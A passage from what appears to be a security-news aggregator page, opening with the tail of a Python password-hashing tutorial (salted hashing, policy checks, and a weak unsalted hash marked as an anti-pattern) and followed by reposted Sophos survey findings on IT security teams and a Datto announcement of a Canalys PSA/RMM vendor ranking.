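    """True if the record predates the current cost setting; rehash at next login."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != ALGORITHM or not parts[1].isdigit():
        return True
    return int(parts[1]) < iterations


def check_policy(password: str, min_length: int = 12) -> List[str]:
    """Reject weak passwords before hashing; a slow hash cannot rescue 'password123'."""
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    if password.lower() in COMMON_PASSWORDS:
        problems.append("appears in the common-password denylist")
    if password.isdigit() or password.isalpha():
        problems.append("uses a single character class")
    return problems


def unsalted_fast_hash(password: str) -> str:
    """The anti-pattern: one fast SHA-256, no salt. Shown only for contrast."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    phrase = "correct horse battery staple"
    alice, bob = hash_password(phrase), hash_password(phrase)
    print("salted records differ for the same password:", alice != bob)
    print("unsalted digests collide:", unsalted_fast_hash(phrase) == unsalted_fast_hash(phrase))
    print("verify correct / wrong:", verify_password(phrase, alice), verify_password("x", alice))
    print("policy problems for 'password123':", check_policy("password123"))
```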

Source: Acunetix

23

Jun

Read our new report The IT Security Team: 2021 and Beyond to ascertain the full impact of the pandemic on the IT security teams around the globe.

Based on findings of an individual survey of 5,400 professionals across 30 countries, the report reveals how IT security teams’ cybersecurity experiences changed over the course of 2020 and what this means for the future delivery of IT security.

More work, more learning

With technology a key enabler for dispersed and digital organizations, IT professionals played a vital role in helping organizations to keep going despite the restrictions and limitations necessitated by COVID-19.

At the same time, adversaries were quick to take advantage of the opportunities presented by the pandemic: 61% of IT teams overall reported an increase in the number of cyberattacks targeting their organization over the course of 2020.

It’s therefore not surprising that demand on IT teams grew over the course of 2020. 63% of respondents said their team saw an increase in non-security workload, while 69% experienced an increase in IT security workload.

However, the vast majority of IT teams that faced a rise in cyberattacks (82%) and a heavier security workload (84%) over the course of 2020 also strengthened their security skills and knowledge.

Adversity brought teams together

Despite the challenges created by the pandemic, 52% of the IT teams surveyed said team morale increased during 2020, with those facing the greatest challenges often reporting the greatest increase. For instance, ransomware victims were considerably more likely to have experienced an increase in team morale than those that weren’t hit (60% versus 47%.)

While morale is also likely influenced by external and personal circumstances during the pandemic, these findings suggest that a shared purpose, a sense of value and facing adversity together helped to bond and lift the spirits of IT teams.

The experiences of 2020 have fuelled ambitions for bigger IT teams

Many teams have entered 2021 with plans to increase the size of both in-house and outsourced IT teams, and to embrace the potential of advanced tools and technologies.

The survey found that 68% of IT teams anticipate an increase in in-house IT security staff by 2023, and 56% expect the number of outsourced IT security staff to grow over the same time frame.

An overwhelming majority (92%) expect AI to help deal with the growing number and/or complexity of threats.

Read the full survey findings

To learn more, including a deep dive into the experiences of different countries and sectors over 2020 and their future IT security delivery plans, read The IT Security Team: 2021 and Beyond survey report.

Source: Sophos

17

Jun

There are many different technologies that drive business for managed service providers (MSPs), but few are more important than professional services automation (PSA) and remote monitoring and management (RMM) tools used to run their core business of delivering IT managed services.

MSPs have a lot on their plate, from managing client relationships and growing the sales pipeline to keeping endpoints up to date and secure and resolving tickets quickly. To grow their business, it’s critical to effectively utilize business management tools like PSA and RMM to drive efficiency, insight, client satisfaction–and ultimately, profitability. So for MSPs, selecting the right vendor for these tools is an important decision.

Canalys MSP Tech Stack Report

Canalys, a third-party analyst firm focused on the MSP channel, recently debuted their annual MSP Tech Stack Report assessing the performance and momentum of global PSA and RMM vendors. Of the 17 vendors analyzed in the report, Datto was given the highest combined Momentum and Performance score, along with placement in the ‘Strategic’ category, indicating a dedication to the development of our solutions and technological capability.

In order to be recognized as a strategic vendor for RMM and PSA, vendors needed to demonstrate strong technological capabilities and illustrate investment and ambition for continued growth. Vendors in this category also needed to display solid work in product development and technological capability, acquisitions to broaden their portfolio, and deliver training to provide MSPs with the skills necessary to help customers with their IT assets.

Driving efficiency and insight through integrated, MSP-centric solutions

Datto has a unique combination of demonstrated performance based on key metrics and strong future opportunities as defined by our technological capabilities, strategy, and open ecosystem. This enables Autotask PSA and Datto RMM to help MSPs deliver efficient, high-quality managed services for the IT environments of today, and prepare for those of tomorrow.

Datto Autotask PSA and RMM are secure, reliable, and intuitive cloud-based platforms designed to help MSPs run their IT managed services business more efficiently. The seamless integration between the two platforms can help elevate MSPs to higher levels of insight, productivity, and profitability with easy navigation between platforms and relevant real-time asset data and actions providing clear insight into your managed estate. This integration enables MSPs to mitigate issues before they occur, shave minutes off each ticket, and unlock new business opportunities.

“We are excited about being ranked as the highest combined scoring vendor in the RMM and PSA space by Canalys,” said Radhesh Menon, Chief Product Officer at Datto. “Being recognized as a ‘strategic’ vendor validates our focus on innovating to help our partners grow their business with secure and easy-to-use platforms that help drive efficiency, actionable insights, and profitability.”

To learn more about the PSA and RMM vendor landscape, download the report today.

Source: Datto